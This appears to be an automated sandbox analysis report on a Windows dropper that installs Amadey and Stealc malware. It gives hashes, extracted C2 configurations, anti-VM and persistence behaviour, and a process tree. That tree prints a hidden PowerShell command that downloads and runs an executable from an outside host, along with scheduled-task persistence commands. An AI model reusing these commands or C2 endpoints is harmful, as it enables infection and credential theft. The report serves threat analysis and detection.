Analysis
-
max time kernel
142s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 13:47
Static task
static1
Behavioral task
behavioral1
Sample
0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe
Resource
win10v2004-20241007-en
General
-
Target
0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe
-
Size
5.6MB
-
MD5
397a4a958187122d965d34dc8198b013
-
SHA1
206ce392cf40663502c4525970af91fc435418ce
-
SHA256
0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc
-
SHA512
7ac1c6fafbb135ce5d19335aaf7860d2d0e5c39a47120193e7132015b147dd5aec6c09cf5102d12f0370f5b7c6d95870bc575a104f76ff7692347657c9a3504b
-
SSDEEP
98304:20hzivitXBgJ3f6/wTmPweEzzIyi0flpUhd1VyrB3CTNaiGzEZm4KzUGuzUT7WaT:ZhzKiFBgJ3fwwKPweuzI90dpUhRyQFqH
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
brat
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1d56j9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2v0072.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3D98B.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 52 2652 powershell.exe -
pid Process 1748 powershell.exe 3700 powershell.exe 2860 powershell.exe 2652 powershell.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1d56j9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2v0072.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3D98B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3D98B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1d56j9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2v0072.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 1d56j9.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 4m029L.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 10 IoCs
pid Process 1528 E4O17.exe 3260 v0u00.exe 4708 1d56j9.exe 1180 skotes.exe 456 2v0072.exe 2496 skotes.exe 3008 3D98B.exe 2052 4m029L.exe 3148 skotes.exe 4216 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 1d56j9.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 2v0072.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 3D98B.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" E4O17.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" v0u00.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4708 1d56j9.exe 1180 skotes.exe 456 2v0072.exe 2496 skotes.exe 3008 3D98B.exe 3148 skotes.exe 4216 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1d56j9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 408 3008 WerFault.exe 90 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v0u00.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1d56j9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2v0072.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3D98B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4m029L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language E4O17.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3D98B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3D98B.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2232 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5008 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 4708 1d56j9.exe 4708 1d56j9.exe 1180 skotes.exe 1180 skotes.exe 456 2v0072.exe 456 2v0072.exe 2496 skotes.exe 2496 skotes.exe 3008 3D98B.exe 3008 3D98B.exe 3008 3D98B.exe 3008 3D98B.exe 1748 powershell.exe 1748 powershell.exe 3700 powershell.exe 3700 powershell.exe 2860 powershell.exe 2860 powershell.exe 2652 powershell.exe 2652 powershell.exe 3148 skotes.exe 3148 skotes.exe 4216 skotes.exe 4216 skotes.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4708 1d56j9.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 920 wrote to memory of 1528 920 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe 83 PID 920 wrote to memory of 1528 920 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe 83 PID 920 wrote to memory of 1528 920 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe 83 PID 1528 wrote to memory of 3260 1528 E4O17.exe 84 PID 1528 wrote to memory of 3260 1528 E4O17.exe 84 PID 1528 wrote to memory of 3260 1528 E4O17.exe 84 PID 3260 wrote to memory of 4708 3260 v0u00.exe 85 PID 3260 wrote to memory of 4708 3260 v0u00.exe 85 PID 3260 wrote to memory of 4708 3260 v0u00.exe 85 PID 4708 wrote to memory of 1180 4708 1d56j9.exe 86 PID 4708 wrote to memory of 1180 4708 1d56j9.exe 86 PID 4708 wrote to memory of 1180 4708 1d56j9.exe 86 PID 3260 wrote to memory of 456 3260 v0u00.exe 87 PID 3260 wrote to memory of 456 3260 v0u00.exe 87 PID 3260 wrote to memory of 456 3260 v0u00.exe 87 PID 1528 wrote to memory of 3008 1528 E4O17.exe 90 PID 1528 wrote to memory of 3008 1528 E4O17.exe 90 PID 1528 wrote to memory of 3008 1528 E4O17.exe 90 PID 920 wrote to memory of 2052 920 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe 110 PID 920 wrote to memory of 2052 920 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe 110 PID 920 wrote to memory of 2052 920 0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe 110 PID 2052 wrote to memory of 60 2052 4m029L.exe 111 PID 2052 wrote to memory of 60 2052 4m029L.exe 111 PID 60 wrote to memory of 2232 60 cmd.exe 115 PID 60 wrote to memory of 2232 60 cmd.exe 115 PID 60 wrote to memory of 3800 60 cmd.exe 116 PID 60 wrote to memory of 3800 60 cmd.exe 116 PID 3800 wrote to memory of 1748 3800 cmd.exe 117 PID 3800 wrote to memory of 1748 3800 cmd.exe 117 PID 60 wrote to memory of 3468 60 cmd.exe 118 PID 60 wrote to memory of 3468 60 cmd.exe 118 PID 3468 wrote to memory of 3700 3468 cmd.exe 119 PID 3468 wrote to memory of 3700 3468 cmd.exe 119 PID 60 wrote to memory of 380 60 cmd.exe 120 PID 60 wrote to memory of 380 60 cmd.exe 120 PID 380 wrote to memory of 2860 380 cmd.exe 121 PID 380 wrote to memory of 2860 380 cmd.exe 121 PID 60 wrote to memory of 5008 60 cmd.exe 122 PID 60 wrote to memory of 5008 60 cmd.exe 122 PID 60 wrote to memory of 2084 60 cmd.exe 123 PID 60 wrote to memory of 2084 60 cmd.exe 123 PID 2084 wrote to memory of 2652 2084 mshta.exe 124 PID 2084 wrote to memory of 2652 2084 mshta.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe"C:\Users\Admin\AppData\Local\Temp\0260aa9c85f6daefc541c6b0e830475547ca426cb5ed56535f2603c95f1a02fc.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\E4O17.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\E4O17.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v0u00.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v0u00.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1d56j9.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1d56j9.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2v0072.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2v0072.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:456
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3D98B.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3D98B.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 15764⤵
- Program crash
PID:408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4m029L.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4m029L.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\36F9.tmp\36FA.tmp\36FB.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4m029L.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\system32\timeout.exetimeout /t 24⤵
- Delays execution with timeout.exe
PID:2232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "H0m45ma6tyd" /tr "mshta \"C:\Temp\RJ97PgG6b.hta\"" /sc minute /mo 60 /ru "Admin" /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5008
-
-
C:\Windows\system32\mshta.exemshta "C:\Temp\RJ97PgG6b.hta"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3008 -ip 30081⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3148
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4216
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
796B
MD5a59eb779137c2c4364c86d9e4838abc2
SHA17bc963e54c2aed1313d5ee4ab6a0d4904e02a664
SHA2562e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc
SHA512d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD51f0f8c49b22409ca78499f5df1ce9456
SHA15300f7ed636959c8c8366418e891dbe49a3edba9
SHA256429128efcec165baf50a81021e610933e1020f5298d865f7b30daf370fb22014
SHA512ca976a7ab0ef4782c3003433e8d99d34d8060cb3a8790e787b56db1e207902b9dd15ecb6e76fecbd00f5e83a8add34329b25f86b90c62055f0d0d1de5607d2af
-
Filesize
1KB
MD558b97594c4d764d5d99a459fbee0fd33
SHA14d1f8f4f5bbf87a6ea3ae7b7be623542377365da
SHA2568001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2
SHA512874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7
-
Filesize
2KB
MD518283422f83c1ac93981ad87b116aaaa
SHA1397308fcc63eef6bdccada1b6bd8ae5d37e81482
SHA2561573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873
SHA5120892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e
-
Filesize
89KB
MD53fda0defee3b30f297e0a77d3b637be8
SHA1acfe5f65845f882080ecab075f037e92049d26a3
SHA25679e78f31ff8d2376f036e3eb46a15f00a22ea3d7053f1c615b292b797a3ed731
SHA5124619cbe0b4de2f79111fbc9c158bc02b8f03880cf8222c7ea5c1d9955675ae37c20f26137b8b7d368479d170f358f807b1f7e63e889c12c7a5f1befeddd1ce7f
-
Filesize
5.5MB
MD5eee553ff9a1383e5eff8f9db49dfd803
SHA11b88bd5c4c4e21dfc20c568bfa8a14f60cf1eea6
SHA2561ab0cf3cf2146fb70bfa9689cff0b415f15989507f841ba548b5c8680ecceddd
SHA51232117262140e81c80c30ddfb423ce99804d8cdb668721be7fdd52fd6e376e50a00cd671578f4367214aeae984b452e853f66773d3d6cb4689ee4db5aedf2c5ea
-
Filesize
1.7MB
MD5fb8c8fb7b1a46e816837a38184ef8b5e
SHA18dccac7d21ca08bf784aa06ba1e36ca7549453ae
SHA25695fcc728d3fe3fcb00130105a0ef965bcbec6dcaa8b822a1d4e57067a39ae389
SHA512ebceada17140a1d08881b2dfea0b2cdfc14a11d18e0c8799c4d8ac27874b8ec30f0a624ceb517012d5aac6b273ffd4946adb5a27eaf466f4234e0f42cca381d7
-
Filesize
3.7MB
MD517004ce8c56d11341c06773ee043b2fd
SHA168eb1d14f4cab41afc6baeaefd55d165b859cee1
SHA2569087be817beb144c47e11584b76b762ed9e0814dff8d851eecde05460d933990
SHA512fe115c49229e2a0bc0af1c7793ff90278987e54aeb75422a817fc669594a35a0474d2fa3ad7e3d645737b2f6c0392082f0a39c39d1f915dce6fbeaf1f10a91a6
-
Filesize
1.8MB
MD5cc1da3bd273c9d738d00bd23d053b126
SHA16a682c1bdda36bdd806b8c2394597845632282bc
SHA2560864f490efab4f565e95437ec1217b73a6201c83087bd87b6da90ce26bf07156
SHA512355479e6711941f6d21d374034a76348d1390bf3d35c3550614d3d73f35e0c7cb43fe77bde811d12238e301c9e6c122c28e0acad62d187e5073daf4a585372d7
-
Filesize
1.8MB
MD52ecd63133d27c40cc1b79d5cb2cc1c78
SHA1093dfbf7f997cb3327ff1655d17d31f44944e08b
SHA2569da1fd129f4a3349a3e3c08f46c099719c22b7382a1b5981c130aa3c5b29a733
SHA51219df14b11c90bd863c735126440cce9cad3ad6275ac3600c56393bb7890321806ae041c03abe28b3312a816f3d6c6d2e7314cea2e20736097f076d524014c92f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82